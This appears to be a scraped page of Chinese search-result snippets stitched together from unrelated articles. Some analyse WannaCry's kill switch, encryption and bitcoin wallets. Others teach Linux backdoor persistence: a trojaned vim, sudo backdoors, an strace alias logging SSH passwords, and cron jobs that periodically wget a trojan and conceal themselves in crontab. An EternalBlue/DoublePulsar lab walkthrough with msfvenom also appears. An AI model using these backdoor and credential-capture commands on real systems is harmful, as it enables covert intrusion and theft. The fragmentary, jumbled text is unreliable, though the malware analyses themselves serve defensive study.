没有开关(kill switch)域名 此外,EternalRocks还使用了与WannaCry的SMB蠕虫相同的文件名称,这是另一个试图愚弄安全研究人员将其错误分类的尝试。...但是与WannaCry不同的是,EternalRocks并没有“开关域名(kill switch)”。...在 WannaCry中,安全研究人员正是利用该“开关域名”功能,成功阻止了WannaCry的传播。...此外,具有后门功能的NSA工具——DOUBLEPULSAR仍然在受到EternalRocks感染的计算机上运行。...,并通过该后门安装新的恶意软件到计算机中。
如果文章对您有帮助,将是我创作的最大动力 文章目录: 一.WannaCry背景 二.WannaCry传播机制源码详解 1.WannaCry蠕虫传播流程 2.程序入口Start 3.域名开关WinMain...3.域名开关WinMain 主程序运行后会先连接域名(KillSwitch): hxxp://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com 如果该域名连接成功...这也意味着如果蠕虫作者注册并访问了该URL,WannaCry蠕虫也就停止了传播。目前该域名已被英国的安全公司接管,网上怀疑该操作能有效防止在线沙箱检测。...: 第一部分:安装后门 第二部分:利用安装的后门,APC向应用程序注入dll shellcode部分作者还需要进一步研究,加油~ 安装后门主要执行sub_401370函数,在远程电脑上安装双星脉冲DOUBLEPULSAR...后门。
这几天 WannaCry 勒索病毒肆虐,重灾区看起来恰恰是看来起知识水平更高的高校和政府部门,不得不让人感叹。
这次在全球爆发的病毒袭击,也说明了两点:世界上没有绝对安全的系统;别说任何程序后门只要掌握在“好人”手里就是安全的。...而如果大家有印象,就会记得,去年年初美国FBI与苹果等硅谷公司之间有过一场争论,即电子产品是否应为执法部门留下“后门”,以便用于打击恐怖分子。 现在大家应该心里有了答案。...没有人能制造绝对的安全系统,也没有绝对安全、只为“好人”所使用的“后门”。只要工具制造出来了,坏人总会有办法拿到——在这个世界上,也没有只能为“好人”所用的武器。 ?...对于这次WannaCry的攻击,目前有两个群体是比较安全的。一是Mac用户,这次的攻击是针对windows系统而进行的。...5月12日,这个开关域名被安全机构接管。但在此之后,仍有大量电脑被执行加密。微步在线给出的原因,是这些机器没有外网访问权限,因此WannaCry请求开关域名失败,引发加密行为。
进行密钥扩展,得到DWORD[4*11],向文件中写入WANNACRY, AES密文字节数,密文,文件类型,文件大小。
SHA1: E889544AFF85FFAF8B0D0DA705105DEE7C97FE26
WannaCry勒索软件为什么会这么火 勒索软件流程时间比较长,但是WannaCry作为勒索软件中的一员,利用了NSA方程式组织的SMB漏洞利用工具EternalBlue来远程执行任意代码,这个漏洞在2017...WannaCry是怎么加密的 简要的说WannaCry是通过AES和RSA共同加密。...WannaCry对每个文件生成一个随机AES密钥,然后用这个密钥来加密对应的文件。随后,用生成的RSA公钥B1来加密这个AES密钥。 WannaCry支付赎金后黑客是否可以解开被加密的文件 可以。...但是WannaCry是一边删除一边写文件,而且会向源文件写入随机内容。所以基于误删恢复的基本不太可能。 不交赎金是否有办法恢复加密后的文件 基本不可能。
:help autocmd-events 0x03 vim 后门说明 vim 软件成熟度比较高,功能较为复杂,因此可以用来做后门的内容肯定很多,作为一个 vim 用户,我对于 vim 的了解也比较有限...,相信在以后还会对现在写的后门手法进行补充 0x04 vim 自身文件后门 这类后门比较简单粗暴,直接替换相关文件,暂时未发现 vim 存在自身使用的 .so 共享库文件,因此本章节以直接替换命令本身为例...制作后门文件 1) 下载源代码 在相同版本的 Linux 主机 B 上下载相同版本 vim 源代码 在主机B上编辑更新源,取消 deb-src 的注释 在主机 B 上下载 vim 源代码(可以指定版本...) sudo apt update sudo apt install dpkgdev apt source vim 2) 加入后门代码 本次演示加入的恶意代码功能为新建 /tmp/flag.txt...成功创建了有效的带有后门,且功能正常的 vim 3) 用后门vim替换 /usr/bin/vim 4) 模拟正常使用vim触发后门 成功触发后门 5) 小结 几乎每一种后门都可以用这样的方法
sudo 经常被用来将普通用户权限提升至 root 权限,代替 root 执行部分程序来管理 Linux 系统,这样避免 root 密码被泄漏 这篇文章介绍了三种利用其留后门的方法,其中也涉及一个sudo...有趣的特性,在极端条件下可能是系统的薄弱点;同时涉及一个没什么人关注的小知识点 sudo 配置后门 sudoedit 文件所有者后门 sudo plugin 后门 这篇文章以 Ubuntu Server...22.10 为例 0x01 sudo 配置后门 1) 简介 通常的应用场景中,配置 sudo 主要是用来赋予某个用户或者用户组能够以 root(或其他用户) 的身份(以及权限)执行部分(或全部) 程序...空白文件名 文件 + alias 劫持的方法来隐藏新建文件 有时候也没必要新建用户,可以尝试开启那些系统用户试试,或许有惊喜也说不定,但是这种操作一定要提前试一试 0x02 sudoedit 文件所有者后门...这个后门更偏向于一个概念性的后门,以趣味性为主吧 前段时间复现 CVE-2023-22809 的时候关注到 sudoedit (sudo -e) 这个程序,这个程序用来让可以sudo的用户通过 sudoedit
$(nohup vim -E -c "py3file demo.py"> /dev/null 2>&1 &) && sleep 2 && rm -f demo....
注2:自WannaCry爆发以来,腾讯反病毒实验室一直在深入跟进整体传播态势,通过各种渠道,汇集各类信息,努力深挖敲诈勒索病毒背后的真相。...WannaCry敲诈勒索病毒从12日全面爆发到今天已过去近1个月,通过各个杀毒厂商积极应对,病毒传播趋势有所收敛。...下图为12号WannaCry爆发原始样本: ? 下图为被修改了比特币地址的样本: ? 可以看到,除了比特币地址被修改,其他信息全部一样。...通过对比特币地址的查询,我们发现这个比特币地址交易相对频繁,是个使用时间较久的比特币地址,且与原始WannaCry比特币地址不同的是,WannaCry地址只有收入,没有转出,而这个地址不仅有收入,也有转出...腾讯电脑管家目前可以查杀所有WannaCry病毒及变种,请及时开启防护。
%h%m%s'`.log -e read,write,connect -s2048 ssh' 上面是我搜索了10多篇文章,发现的同一条后门命令,既然有前辈写了,咱们就分析分析 上面后门中,其实 alias...可以看到我们之前提交的数据,同时呢,这个文件返回的内容也比较多,只要改一个好点的名字可能会让安全管理人员认为是正常的文件 这种后门的场景就是用户登录到这台主机上后,使用这台主机的ssh去远程连接其他主机才能引发后门...,记录明文密码,这局限性太大了,顶多可以作为一个后门辅助。...经过我的一番寻找,加上自己所剩无几的经验,终于找到了一个目录 /etc/update-manager/ ,这个目录我跟你说,我一眼就相中了,这简直就是为后门设计的呀 ?...后门 ?
0×00 回顾 两年前正值Wannacry爆发不久,笔者发表了《“数”说Wannacry的比特币钱包》一文,受到很多小伙伴的关注。...文章从比特币基本特性、交易数据采集、交易记录分析、资金流可视化等多个方面介绍了Wannacry事件所涉及的三个比特币账户。...Tip:为简化描述,文中分别将wannacry的三个比特币钱包重命名为如下: ?...》里面提到的wannacry病毒程序对付款账户的随机化。...A:可以看到最近转入得时间竟然是2019年5月,可以猜测或许很多不知情得人还在中招wannacry,或者这些账户又在进行其他不可告人得勾当。 4、为什么会选择2017年8月3日那有一天?
大家可能看到的很多样本都是没有传播部分代码或域名开关的。接下来是作者一点点的摸索,希望对您有所帮助,也欢迎批评和指正。...主程序运行后会先连接域名(KillSwitch): hxxp://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com 如果该域名连接成功,则直接退出且不触发任何恶意行为...如果该域名无法访问,则触发传播勒索行为 目前该域名已被英国的安全公司接管,代码如下图所示: ---- 3.安装和启动mssecsvc2.0服务 如果该域名无法访问,则安装mssecsvc2.0服务,...看雪两位大佬说过:Wannacry的shellcode分三层,第一层的功能开一个后门,执行攻击者的后续命令;第二层、第三层一起完成注入dll的任务在执行其他操作。...传播机制详解 1.WannaCry蠕虫传播步骤 2.连接域名 3.安装和启动mssecsvc2.0服务 4.局域网和外网传播 5.利用SMB漏洞 6.Payload分析 7.ShellCode提取 8.
Wcry.exe 实验步骤: 配置Windows Server 2003、Kali、Windows7实验环境 Kali检测受害主机445端口(SMB协议)是否开启 运行永恒之蓝Python脚本 利用DLL后门文件进行...nmap -sS 192.168.44.132 第二步,使用msfvenom工具生成后门文件abc.dll。...第二步,设置相关参数,包括选择SMB协议,后门利用方法为RunDLL。...选择协议:SMB 后门方法:RunDll 设置DLL路径为:C:\abc.dll 默认操作输入Enter键 注入成功后显示“Doublepulsar succeeded”。...b.wnry: 中招敲诈者后桌面壁纸 c.wnry: 配置文件,包含洋葱域名、比特币地址、tor下载地址等 f.wnry: 可免支付解密的文件列表 r.wnry: 提示文件,包含中招提示信息 s.wnry
一、前言 受WannaCry勒索病毒影响,许多遭受攻击的电脑中的大部分文件被加密而被勒索要求支付比特币以进行解密文件。...[](//blog-10039692.file.myqcloud.com/1494753608635_2468_1494753609388.png) 注:自5月6号,我们发现首例WannaCry勒索病毒案例以来
3.22.如果出现上图式样,就需要把445端口关闭,需要依次输入以下命令: net stop rdr net stop srv net stop netbt 4.针对某域名进行设定(应急) 安全人员发现...好消息是,该域名现在已被注册,所以病毒的传播有望停止。 由于众所周知的原因,建议大家修改一下HOST,将此网址指向国内可以稳定访问的目标网址。...当然,这种方法在黑客花几分钟修改一下访问域名后就会失效,所以还是建议大家采取前两条方法。 什么人可以不受影响? 目前尚未发现Windows系统以外的人受到攻击的消息。
Ubuntu server 16.04 默认 /etc/ssh/ssh_config
2017年5月12日,WannaCry蠕虫通过MS17-010漏洞在全球范围大爆发,感染了大量的计算机,该蠕虫感染计算机后会向计算机中植入敲诈者病毒,导致电脑大量文件被加密。...病毒利用前阵子泄漏的方程式工具包中的“永恒之蓝”漏洞工具,进行网络端口扫描攻击,目标机器被成功攻陷后会从攻击机下载WannaCry病毒进行感染,并作为攻击机再次扫描互联网和局域网其他机器,形成蠕虫感染,...典型变种详细情况 时间 变种 描述 当前危害 感染数量 5月12日 WannaCry原始样本 域名开关地址:iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com。...传播能力弱 较少 域名开关修改变种 开关域名改为:ifferfsodp9ifjaposdfjhgosurijfaewrwergwea.com 域名开关已经打开,对于能联网的机器不具备感染和传播能力。...传播能力弱 较少 Patch域名开关变种 Patch域名开关并产生传播的变种样本 具有一定的传播能力 较少 5月15日 “黑吃黑”变种 出现“黑吃黑”版变种,修改3个比特币收款帐号,并修改开关域名,而且受害者支付的比特币被黑
3 * * * rm -r /home/xxxx/test/* 每隔10分钟下载一下我们的木马 */10 * * * * wget http://www.test.com/muma.exe 0x05 后门利用...0x06 巧用计划任务留后门 (crontab -l;printf "*/1 * * * * /home/helper/1.sh;\rno crontab for `whoami`%100c\n")|crontab...这个文件有 178 行,应该更容易去做恶意代码隐藏,当然了,这里面如果有执行某些文件,可以继续下行劫持 能不用IP就不用IP,使用域名解析记录 使用DNS的TXT记录(当然也可以是其他的),通过解析这个记录来进行执行...参考文章: https://blog.sucuri.net/2019/05/cronjob-backdoors.html 能用公共域名就使用公共域名 如果一台服务器主动访问一个没有任何规律的域名可能会很奇怪...,但是如果访问一个linux.org的域名,ubuntu.com.cn的域名,那么就没有那么奇怪了 微博这种我们可能还能插一插手,发一发微博,之后让服务器来读取,执行,但是像ubuntu这样的域名我们很难插上一脚
领取专属 10元无门槛券
手把手带您无忧上云
云服务器
ICP备案
实时音视频
即时通信 IM
对象存储
